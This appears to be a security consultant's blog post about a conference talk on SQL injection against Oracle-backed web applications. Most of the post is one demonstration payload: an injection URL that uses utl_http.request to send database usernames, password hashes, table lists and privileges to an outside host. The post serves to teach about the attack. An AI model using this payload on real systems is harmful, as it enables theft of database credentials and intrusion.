Just back from the IT Underground 2009 in Prague.
I met several smart security consultants and some of my customers from different countries in Europe (Belgium, Poland, Germany, UK, …) and had a lot of interesting talks.
I gave a presentation concerning SQL Injection in web applications with Oracle backend databases.
Here a short example from the presentation:
The following (vulnerable) URL is sending all usernames/passwords, all accessible tables, tables and column, roles and privileges in a single SQL statement to a remote system. This can be done with a simple trick. Just use sum(length(utl_http.request(()))).
http://victim.com/order.jsp?id=17‚ or 1=((select sum(length(utl_http.request(‚http://www.orasploit.com/’username||’=’||password) from dba_users)))+((select sum(length(utl_http.request(‚http://www.orasploit.com/’owner||’=’||table_name) from dba_tables)))+((select sum(length(utl_http.request(‚http://www.orasploit.com/’owner||’=’||table_name||’=’||column_name)) from dba_users))+((select sum(length(utl_http.request(‚http://www.orasploit.com/’grantee||’=’||granted_role) from dba_role_privs)))+((select sum(length(utl_http.request(‚http://www.orasploit.com/’grantee||’=’||owner||’=’||table_name||’=’||privilege||’=’||grantable) from dba_tab_privs)))–
More details in the presentation.